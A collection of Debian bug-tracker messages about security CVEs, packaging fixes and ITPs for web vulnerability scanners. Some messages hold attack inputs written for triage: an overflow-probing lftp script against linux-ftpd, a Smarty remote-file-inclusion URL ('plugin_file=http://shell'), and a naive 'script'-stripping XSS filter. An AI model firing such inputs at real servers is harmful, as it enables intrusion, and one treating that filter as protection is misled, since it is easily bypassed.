Bug#526121: hotssh: versioned build-dependency on scrollkeeper
On Wed, Apr 29, 2009 at 02:17:44PM +0200, Josselin Mouette wrote: Package: hotssh Version: 0.5.2-3 Severity: serious Hi, Hi, currently hotssh Build-Depends on scrollkeeper (= 0.3.14). However, we are about to remove scrollkeeper from the archive; hence the serious severity. Please remove the version requirement, or add rarian-compat as an alternative. Soon, only rarian-compat will remain. Let me first check if I can use rarian-compat instead of scrollkeepr. I'll send you a mail when I'm finished checking, ok? Thanks, Regards, Thomas. -- .''`. Josselin Mouette : :' : `. `' “I recommend you to learn English in hope that you in `- future understand things” -- Jörg Schilling signature.asc Description: Digital signature
Bug#526121: hotssh: versioned build-dependency on scrollkeeper
On Thu, Apr 30, 2009 at 11:26:11AM +0200, Josselin Mouette wrote: Le jeudi 30 avril 2009 à 09:28 +0200, Thomas Bläsing a écrit : Please remove the version requirement, or add rarian-compat as an alternative. Soon, only rarian-compat will remain. Let me first check if I can use rarian-compat instead of scrollkeepr. I'll send you a mail when I'm finished checking, ok? Thanks. If there’s anything still missing in rarian-compat so that it can completely emulate scrollkeeper, I’ll be glad to add it. I've got a look at the build-deps of hotssh and changed the scrollkeeper to rarian-compat. It builds without errors and seems to work as normal as before. It's lintian clean, too ;) I've put the relevant files to: http://www-pool.math.tu-berlin.de/~thomasbl/hotssh/ Can you please upload the package? thanks, Thomas. signature.asc Description: Digital signature
Bug#512532: CVE-2008-5659: The gnu.java.security.util.PRNG class in GNU Classpath 0.97.2 and ...
Source: classpath Version: = 0.97.2 Severity: grave Tags: security Hi, the following CVE (Common Vulnerabilities Exposures) id was published for classpath. CVE-2008-5659[0]: | The gnu.java.security.util.PRNG class in GNU Classpath 0.97.2 and | earlier uses a predictable seed based on the system time, which makes | it easier for context-dependent attackers to conduct brute force | attacks against cryptographic routines that use this class for | randomness, as demonstrated against DSA private keys. If you fix the vulnerability please also make sure to include the CVE id in your changelog entry. For a better description of this bug please have a look at: http://gcc.gnu.org/bugzilla/show_bug.cgi?id=38417 The affected code you can find in classpath-0.97.2/gnu/java/security/util/PRNG.java on the lines where ``System.currentTimeMillis();'' is used. For further information see: [0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5659 http://security-tracker.debian.net/tracker/CVE-2008-5659 Kind regards, Thomas. signature.asc Description: Digital signature
Bug#505116: ITP: proxystrike -- an active Web Application Proxy designed to find vulnerabilities while browsing
Package: wnpp Severity: wishlist Owner: Thomas Bläsing [EMAIL PROTECTED] Package name: proxystrike Version : 2.0 Upstream Author : Carlos del Ojo Elías deepbit_AT_gmail.com URL : http://www.edge-security.com/proxystrike.php License : GPLv2 Language: python Description : an active Web Application Proxy designed to find vulnerabilities while browsing ProxyStrike is a tool designed to find Sql injection and xss vulnerabilities while browsing an application. The process is very simple, ProxyStrike runs like a passive proxy listening on port 8008 by default, so you have to browse the desired web site using ProxyStrike as proxy and it will attack all the parameters in background mode. Kind regards, Thomas. signature.asc Description: Digital signature
Bug#471512: RFP: get-you
retitle 471512 RFP: get-you -- Download tool for a lot of video portals written in java thanks hi, this packages is written in _java_ ] getyou/ $ find . -name *.py | wc -l ] 0 ] getyou/ $ find . -name *.java | wc -l ] 133 There also exists a package for ubuntu on: https://launchpad.net/get-you/+download I don't want to maintain this package so feel free to adopt it :) Kind regards, Thomas. signature.asc Description: Digital signature
Bug#500278: not vulnerable?
hi, I've installed the actually linux-ftpd version in order to make a NMU. I was wondering by doing the following to reproduce the bug: ] $ echo open ftp://[EMAIL PROTECTED]:21 script; python -c 'for i in range(1,5200): print %ssyst % (A*i)' script ] $ lftp -f script out ] $ grep -iv Unknown command \`[A]*syst'. out | wc -l ] 0 As you can see there is no problem :) Btw, the buffer is only 512K big, so ftpd might split the incoming buffer as mentioned in http://lists.grok.org.uk/pipermail/full-disclosure/2008-September/064697.html Furthermore, the patch which is attached to this bug causes the package not to build properly. So, it's better to wait for a new upstream release or fix the patch :) Kind regards, Thomas. signature.asc Description: Digital signature
Bug#500381: vim: CVE-2008-4101 Vim 3.0 through 7.x before 7.2.010 does not properly escape ...
Source: vim Version: 7.2.000-3 Severity: grave Tags: security patch Hi, the following CVE (Common Vulnerabilities Exposures) id was published for vim. CVE-2008-4101[0]: | Vim 3.0 through 7.x before 7.2.010 does not properly escape | characters, which allows user-assisted attackers to (1) execute | arbitrary shell commands by entering a K keystroke on a line that | contains a ; (semicolon) followed by a command, or execute arbitrary | Ex commands by entering an argument after a (2) Ctrl-] (control | close-square-bracket) or (3) g] (g close-square-bracket) keystroke | sequence, a different issue than CVE-2008-2712. If you fix the vulnerability please also make sure to include the CVE id in your changelog entry. For further information see: [0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4101 http://security-tracker.debian.net/tracker/CVE-2008-4101 The patch is available at: http://groups.google.com/group/vim_dev/msg/9290f26f9bc11b33 For a better explanation see: http://www.rdancer.org/vulnerablevim-K.html Kind regards, Thomas. signature.asc Description: Digital signature
Bug#488523: smarty: CVE-2007-2326 Multiple PHP remote file inclusion vulnerabilities in HYIP Manager Pro ...
On Mon, Aug 04, 2008 at 08:24:22PM +0200, Tomas Hoger wrote: Hi Thomas! Hi Tomas, Have you managed to reproduce this, even with Smarty in webroot and register_globals enabled? Your report mentions _get_plugin_filepath, but that does seem to be a different vector that one described in the original report. $type and $name can not be spoofed with register_globals, as those are function arguments. Moreover, in most cases where _get_plugin_filepath is called, both arguments are fixed strings or values read from the (trusted) file. Reported attack vector is: Smarty_Compiler.class.php?plugin_file=http://shell However, $plugin_file is always initialized before use in Smarty_Compiler.class.php. Is the original report bogus or does HYIP use some old or customized Smarty version? (Well, I guess you don't know the real answer to this, just like me ;). First of all, sorry for the long delay! I had a big hardware crash on my developing pc :( So, I now have tested it again on a PC on my work and I am wondered that it doesn't be vulnerable again like before. It's the same versions and packages installed ... So, Either I did a mistake on my first research or now. My offer for you is that if you also aren't able to reproduce this issue for the actually smarty package, you can close this bug and all is fine, because you know the source better than me, I think. -- Tomas Hoger Kind regards, Thomas. signature.asc Description: Digital signature
Bug#493579: upstream patch for XSS
On Thu, Aug 07, 2008 at 05:40:08PM +1000, Steffen Joeris wrote:
Hi
Hi,
I've attached the part from the upsteam VCS, which should address this XSS.
Upstream confirmed this via private email. I am still looking into #493372,
but it seems that unstable and testing are already fixed.
No, there is no fix in unstable and testing, because the used version is
also 0.95-1 and there isn't the patch included - I checked it again today.
But if the maintainer fixes the #493372 they will also fix this bug within the
upstream patch, I think, and so it's not very important to discuss it anymore,
because it's just a XSS issue which isn't an very hard bug :)
Cheers
Steffen
Kind regards,
Thomas.
--- new/owl-dms-0.95/lib/owl.lib.php 2007-10-07 13:42:37.0 +
+++ upstream/owl.lib.php 2008-08-06 14:18:41.0 +
@@ -70,6 +71,9 @@
}
}
+$username = ereg_replace('script','', $username);
+$username = ereg_replace('/script','', $username);
+
require_once($default-owl_fs_root ./lib/sort.lib.php);
if(!empty($_GET[currentdb]))
signature.asc
Description: Digital signature
Bug#493576: pdns-server: CVE-2008-3217 ( PowerDNS Recursor before 3.1.6 does not always use the strongest random number generator... )
Package: pdns-server Version: 2.9.21-6 Severity: serious Tags: security Hi, the following CVE (Common Vulnerabilities Exposures) id was published for pdns-server. CVE-2008-3217[0]: | PowerDNS Recursor before 3.1.6 does not always use the strongest | random number generator for source port selection, which makes it | easier for remote attack vectors to conduct DNS cache poisoning. NOTE: | this is related to incomplete integration of security improvements | associated with addressing CVE-2008-1637. If you fix the vulnerability please also make sure to include the CVE id in your changelog entry. For further information see: [0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3217 http://security-tracker.debian.net/tracker/CVE-2008-3217 Kind regards, Thomas. signature.asc Description: Digital signature
Bug#493579: owl-dms: CVE-2008-3100 (Cross-site scripting (XSS) vulnerability in lib/owl.lib.php ...)
Package: owl-dms Version: 0.95-1 Severity: normal Tags: security patch Hi, the following CVE (Common Vulnerabilities Exposures) id was published for owl-dms. CVE-2008-3100[0]: | Cross-site scripting (XSS) vulnerability in lib/owl.lib.php in Steve | Bourgeois and Chris Vincent Owl Intranet Knowledgebase 0.95 and | earlier allows remote attackers to inject arbitrary web script or HTML | via the username parameter in a getpasswd action to register.php. If you fix the vulnerability please also make sure to include the CVE id in your changelog entry. For further information see: [0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3100 http://security-tracker.debian.net/tracker/CVE-2008-3100 There is a fix out there at: http://owl.cvs.sourceforge.net/*checkout*/owl/owl-0.90/lib/owl.lib.php Kind regards, Thomas. signature.asc Description: Digital signature
Bug#492492: moodle: CVE-2008-3326 Cross-site scripting (XSS) vulnerability in blog/edit.php
Package: moodle Version: 1.8.2-1.3 Severity: normal Tags: security Hi, there is a Cross-site scripting (XSS) vulnerability in blog/edit.php as mentioned in [0]. There is also a patch for this version at [1]. So, please change the affected lines of code in the source :) [0] http://moodle.org/mod/forum/discuss.php?d=101401 [1] http://cvs.moodle.org/moodle/blog/lib.php?r1=1.38.6.3r2=1.38.6.2 Kind regards, Thomas. signature.asc Description: Digital signature
Bug#488527: change severity for several bugs
severity 488523 normal severity 488525 normal severity 488527 normal thanks Hi, I change the severity of this bug to normal, because this is a non-issue. To exploit this, the smarty files need to be installed in a http daemon accessible directory. (should be the case for embedded copies), however additionally this relies on register_globals being switched on. Kind Regards, Thomas. signature.asc Description: Digital signature
Bug#487095: xen-3: multiple security issues
Source: xen-3 Version: 3.2.1-1 Severity: grave Tags: security, patch Hi, the following CVE (Common Vulnerabilities Exposures) ids were published for xen-3. CVE-2008-1943[0]: | Buffer overflow in the backend of XenSource Xen Para Virtualized Frame | Buffer (PVFB) 3.0 through 3.1.2 allows local users to cause a denial | of service (crash) and possibly execute arbitrary code via a crafted | description of a shared framebuffer. CVE-2008-1944[1]: | Buffer overflow in the backend framebuffer of XenSource Xen | Para-Virtualized Framebuffer (PVFB) Message 3.0 through 3.0.3 allows | local users to cause a denial of service (SDL crash) and possibly | execute arbitrary code via bogus screen updates, related to missing | validation of the format of messages. CVE-2008-1952[2]: | ** RESERVED ** | This candidate has been reserved by an organization or individual that | will use it when announcing a new security problem. When the | candidate has been publicized, the details for this candidate will be | provided. If you fix the vulnerabilities please also make sure to include the CVE ids in your changelog entry. For further information see: [0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1943 http://security-tracker.debian.net/tracker/CVE-2008-1943 [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1944 http://security-tracker.debian.net/tracker/CVE-2008-1944 [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1952 http://security-tracker.debian.net/tracker/CVE-2008-1952 These issues are fixed within the following patch for fedora: http://cvs.fedoraproject.org/viewcvs/rpms/xen/F-9/xen-pvfb-validate-fb.patch?view=markup Kind regards, Thomas. signature.asc Description: Digital signature
Bug#487097: xen-unstable: multiple security issues
Source: xen-unstable Version: 3.3-unstable+hg17602-1 Severity: grave Tags: security, patch Hi, the following CVE (Common Vulnerabilities Exposures) ids were published for xen-unstable. CVE-2008-1943[0]: | Buffer overflow in the backend of XenSource Xen Para Virtualized Frame | Buffer (PVFB) 3.0 through 3.1.2 allows local users to cause a denial | of service (crash) and possibly execute arbitrary code via a crafted | description of a shared framebuffer. CVE-2008-1944[1]: | Buffer overflow in the backend framebuffer of XenSource Xen | Para-Virtualized Framebuffer (PVFB) Message 3.0 through 3.0.3 allows | local users to cause a denial of service (SDL crash) and possibly | execute arbitrary code via bogus screen updates, related to missing | validation of the format of messages. CVE-2008-1952[2]: | ** RESERVED ** | This candidate has been reserved by an organization or individual that | will use it when announcing a new security problem. When the | candidate has been publicized, the details for this candidate will be | provided. If you fix the vulnerabilities please also make sure to include the CVE ids in your changelog entry. For further information see: [0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1943 http://security-tracker.debian.net/tracker/CVE-2008-1943 [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1944 http://security-tracker.debian.net/tracker/CVE-2008-1944 [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1952 http://security-tracker.debian.net/tracker/CVE-2008-1952 These issues are fixed within the following patch for fedora: http://cvs.fedoraproject.org/viewcvs/rpms/xen/F-9/xen-pvfb-validate-fb.patch?view=markup Kind regards, Thomas. signature.asc Description: Digital signature
Bug#487097: xen-unstable: multiple security issues
hi, I'm sorry! The CVE-2008-1952 doesn't affect you, so please disregard it :) Kind regards, Thomas. signature.asc Description: Digital signature
Bug#426837: ITP: giplet -- GNOME IP display applet
owner 426837 ! retitle 426837 ITP: giplet -- GNOME IP display applet thanks Hi, i am intent to package this small app ;) Kind regards, Thomas. signature.asc Description: Digital signature
Bug#486110: vmware-package: CVE-2008-0967 Untrusted search path vulnerability in vmware-authd in VMware ...
Package: vmware-package Version: 0.22 Severity: important Tags: security Hi, the following CVE (Common Vulnerabilities Exposures) id was published for vmware-package. CVE-2008-0967[0]: | Untrusted search path vulnerability in vmware-authd in VMware | Workstation 5.x before 5.5.7 build 91707 and 6.x before 6.0.4 build | 93057, VMware Player 1.x before 1.0.7 build 91707 and 2.x before 2.0.4 | build 93057, and VMware Server before 1.0.6 build 91891 on Linux, and | VMware ESXi 3.5 and VMware ESX 2.5.4 through 3.5, allows local users | to gain privileges via an unspecified option in a configuration file. If you fix the vulnerability please also make sure to include the CVE id in your changelog entry. For further information see: [0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0967 http://security-tracker.debian.net/tracker/CVE-2008-0967 As mentioned in bug #484491, I think you just need to update the hashes for the tarballs to fix this bug :) Kind regards, Thomas. signature.asc Description: Digital signature
Bug#485919: vmware-package: CVE-2008-2100 Multiple buffer overflows in VIX API 1.1.x before 1.1.4 build 93057
Package: vmware-package Version: 0.22 Severity: normal Tags: security Hi, the following CVE (Common Vulnerabilities Exposures) id was published for vmware-package. CVE-2008-2100[0]: | Multiple buffer overflows in VIX API 1.1.x before 1.1.4 build 93057 on | VMware Workstation 5.x and 6.x, VMware Player 1.x and 2.x, VMware ACE | 2.x, VMware Server 1.x, VMware Fusion 1.x, VMware ESXi 3.5, and VMware | ESX 3.0.1 through 3.5 allow guest OS users to execute arbitrary code | on the host OS via unspecified vectors. If you fix the vulnerability please also make sure to include the CVE id in your changelog entry. For further information see: [0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2100 http://security-tracker.debian.net/tracker/CVE-2008-2100 As mentioned in bug #484491, I think you just need to update the hashes for the tarballs to fix this bug :) Kind regards, Thomas. signature.asc Description: Digital signature
Bug#485807: wordpress: CVE-2008-2392 Unrestricted file upload vulnerability in WordPress 2.5.1 and earlier
Package: wordpress Version: = 2.5.1-3 Severity: important Tags: security Hi, the following CVE (Common Vulnerabilities Exposures) id was published for wordpress. CVE-2008-2392[0]: | Unrestricted file upload vulnerability in WordPress 2.5.1 and earlier | might allow remote authenticated administrators to upload and execute | arbitrary PHP files via the Upload section in the Write Tabs area of | the dashboard. If you fix the vulnerability please also make sure to include the CVE id in your changelog entry. For further information see: [0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2392 http://security-tracker.debian.net/tracker/CVE-2008-2392 It seems that this bug is mentioned in wordpress as #7113 and is fixed with the new svn revision 8068. The diff for that can be viewed at: http://trac.wordpress.org/attachment/ticket/7113/7113.2.diff Kind regards, Thomas. signature.asc Description: Digital signature
Bug#485807: wordpress: CVE-2008-2392 Unrestricted file upload vulnerability in WordPress 2.5.1 and earlier
Hi, first of all SORRY for my mistakes in the last mail. The 'Version'-tag is not really correct. So, you can ignore the '=' :) And, I am not 100% sure that the diff from the wordpress trac system, I wrote, is the patch for the bug! It seems so but I just had have only a quick look at it. sorry, Thomas. signature.asc Description: Digital signature
Bug#485841: freetype: multiple security issues
Package: freetype Version: 2.3.5-1 Severity: important Tags: security Hi, there are some security issues for FreeType2 2.3.5 as you can see on the following websites: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=715 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=716 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=717 It seems that they are be solved in the new version 2.3.6 of FreeType2. Kind regards, Thomas. signature.asc Description: Digital signature
Bug#366137: ITP: python-xlrd - extracting data from MS-Excel files
rename ITP: python-xlrd - extracting data from MS-Excel files thanks Hi, the package is in a ready state and just need to be uploaded by my favorite sponsor :) Thomas. signature.asc Description: Digital signature
Bug#366137: RFP: python-xlrd - extracting data from MS-Excel files
owner ! thanks Hi, after getting the permissions from Joost van Baal via mail I am intend to maintain this package. Thomas. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#477034: Patch to fix 477034
On Fri, Apr 25, 2008 at 07:42:29PM +0530, Kumar Appaiah wrote: tags 477034 + patch thanks Hi! Please find attached a patch to fix this bug. The solution is to just use the right Python version as given by pyversions -d. First of all, thanks! But I am solving some other minor fixes for this packages, so I just didn't look for an Sponsor who could upload this package for me. Seems to be in ready state at end of next week, maybe earlier :) HTH. Kumar Regards, Thomas. -- Kumar Appaiah, 458, Jamuna Hostel, Indian Institute of Technology Madras, Chennai - 600 036 diff -Nru --exclude changelog wapiti-1.1.6/debian/rules wapiti-1.1.6/debian/rules --- wapiti-1.1.6/debian/rules 2008-04-25 09:30:48.0 +0530 +++ wapiti-1.1.6/debian/rules 2008-04-25 09:30:48.0 +0530 @@ -22,7 +22,7 @@ chmod +x $(CURDIR)/debian/wapiti/usr/bin/wapiti # for lintian to solve the hybrid problem - chmod +x $(CURDIR)/debian/wapiti/usr/lib/python2.4/site-packages/*.py + chmod +x $(CURDIR)/debian/wapiti/usr/lib/`pyversions -d`/site-packages/*.py #rm -f $(CURDIR)/debian/wapiti/usr/lib/python2.4/site-packages/*.egg-info binary-indep: install signature.asc Description: Digital signature
Bug#435261: FTBFS: dpkg-genchanges: failure: cannot read files list file: No such file or directory
On Mon, Jul 30, 2007 at 09:40:58AM -0600, dann frazier wrote: Package: python-libpcap Version: 0.6.1+cvs.2007.07.28-1 Severity: serious From http://buildd.debian.org/fetch.cgi?pkg=python-libpcapver=0.6.1%2Bcvs.2007.07.28-1arch=ia64stamp=1185757680file=log: [snip] running build running build_ext building '_pcapmodule' extension generating constants.c from mk-constants.py swig -Wall -python -shadow -ISWIG -o pcap.c pcap.i /usr/bin/python ./build-tools/docify.py pcap.c /usr/bin/python ./build-tools/docify-shadow.py pcap.py creating build creating build/temp.linux-ia64-2.4 gcc -pthread -fno-strict-aliasing -DNDEBUG -g -O2 -Wall -Wstrict-prototypes -fPIC -DSWIG_COBJECT_TYPES -I/usr/include/python2.4 -c pcap.c -o build/temp.linux-ia64-2.4/pcap.o pcap.c: In function 'init_pcap': pcap.c:4260: warning: passing argument 3 of 'PyModule_AddStringConstant' discards qualifiers from pointer target type gcc -pthread -fno-strict-aliasing -DNDEBUG -g -O2 -Wall -Wstrict-prototypes -fPIC -DSWIG_COBJECT_TYPES -I/usr/include/python2.4 -c pcap_interface.c -o build/temp.linux-ia64-2.4/pcap_interface.o gcc -pthread -fno-strict-aliasing -DNDEBUG -g -O2 -Wall -Wstrict-prototypes -fPIC -DSWIG_COBJECT_TYPES -I/usr/include/python2.4 -c exception.c -o build/temp.linux-ia64-2.4/exception.o gcc -pthread -fno-strict-aliasing -DNDEBUG -g -O2 -Wall -Wstrict-prototypes -fPIC -DSWIG_COBJECT_TYPES -I/usr/include/python2.4 -c error.c -o build/temp.linux-ia64-2.4/error.o creating build/lib.linux-ia64-2.4 gcc -pthread -shared build/temp.linux-ia64-2.4/pcap.o build/temp.linux-ia64-2.4/pcap_interface.o build/temp.linux-ia64-2.4/exception.o build/temp.linux-ia64-2.4/error.o -lpcap -o build/lib.linux-ia64-2.4/_pcapmodule.so running build_py copying pcap.py - build/lib.linux-ia64-2.4 /usr/bin/fakeroot debian/rules binary-arch make: Nothing to be done for `binary-arch'. dpkg-genchanges -B dpkg-genchanges: arch-specific upload - not including arch-independent packages dpkg-genchanges: failure: cannot read files list file: No such file or directory I don't have access to an ia64 machine, so my first intention is to modify the debian/rules: --- debian/rules2007-07-30 19:31:25.0 +0200 +++ debian/rules.new2007-07-30 19:32:34.0 +0200 @@ -37,7 +37,5 @@ dh_md5sums dh_builddeb -binary-arch: - -binary: binary-indep binary-arch -.PHONY: build clean binary-indep binary-arch binary install +binary: binary-indep +.PHONY: build clean install binary-indep Does it work now? Regards, Thomas. signature.asc Description: Digital signature
Bug#434804: Description does not say much about the package
On Thu, Jul 26, 2007 at 10:56:09PM +0200, Enrico Zini wrote: Package: wapiti Version: 1.1.6-1 Severity: normal Hello, Hello, thanks for maintaining wapiti. I noticed it entering lenny, but from the description I could not tell if I am interested in the package or not. The main thing I think is missing is some details about what kind of vulnerabilities are scanned and how: does it have a database of known vulnerabilities in known web applications, does it crawl the pages of a web application filling in every field with potentially dangerous content, or something else? Well, I'll repackage it with a better description, because it's really a little bit strange. Sorry for that, it is one of my first packages but if you don't want to wait until the package is up you can have a look at the webpage http://wapiti.sourceforge.net/ . Best regards, Enrico Regards, Thomas. signature.asc Description: Digital signature
Bug#372656: [CLOSED] python-irclib 0.4.6 available
fixed 372656 0.4.6-1 thanks hi, I'm the new maintainer. I've uploaded the new version and so the Bug is fixed ;) Regards, Thomas. signature.asc Description: Digital signature
Bug#215367: ITP: pylibpcap - status?
owner 215367 ! thanks On Mon, Jul 23, 2007 at 11:52:19AM +1000, Paul Wise wrote: On Sun, 2007-07-22 at 12:04 +0200, Thomas Bläsing wrote: I'm very interested in maintain this package. So, is there any further working on it or can I take it? Before a package can be uploaded, this bug needs to be fixed: http://sf.net/support/tracker.php?aid=1320469 Looks like it has been fixed in CVS, but not in the latest release. I don't really have much time to maintain more packages,or sponsor any, so feel free to take over this ITP. ok, thanks ;) So I guess you will have to package a CVS snapshot for this to be uploaded to Debian. I try to make a package till end of the week ;) The developers contacted me by mail and we will find a solution, I think. You might want to join the Debian Python Modules Team: http://wiki.debian.org/Teams/PythonModulesTeam I'll read it tonight and then try to get involved, because I have to maintain 2 other python packages. Paul: Could you sponsor me for this package when it is completed? Thanks, Thomas. signature.asc Description: Digital signature
Bug#215367: ITP: pylibpcap - status?
hi, I'm very interested in maintain this package. So, is there any further working on it or can I take it? Greets, Thomas. signature.asc Description: Digital signature
Bug#431952: ITP: python-plwm -- Pointless Window Manager - python library for creating
owner 431952 ! thanks I'll take and create a package. thanks, Thomas. signature.asc Description: Digital signature
Bug#431952: ITP: python-plwm -- Pointless Window Manager - python library for creating
On Fri, Jul 06, 2007 at 09:37:57AM -0400, Mike O'Connor wrote: owner 431952 ! thanks I'll take and create a package. thanks, Thomas. I've already created packages. They are available here: http://vireo.org/debian/tritium/ oh, sorry! I understand it in this way that you didn't wan't create a package... Sorry for my stupidity. stew Regards, Thomas signature.asc Description: Digital signature
Bug#377153: ITP: python-pysearch -- pYsearch is a wrapper for the Yahoo! search API
owner 377153 ! thanks Hi, after nearly a year of nothing done, and a new version of pYsearch I'll take it to me and create a package... Regards, Thomas. signature.asc Description: Digital signature
Bug#381418: ITP: wapiti -- Web application vulnerability scanner
retitle 381418 ITP: wapiti -- Web application vulnerability scanner owner 381418 [EMAIL PROTECTED] thanks Played also much with it and try to build a package :) Regards, Thomas. signature.asc Description: Digital signature
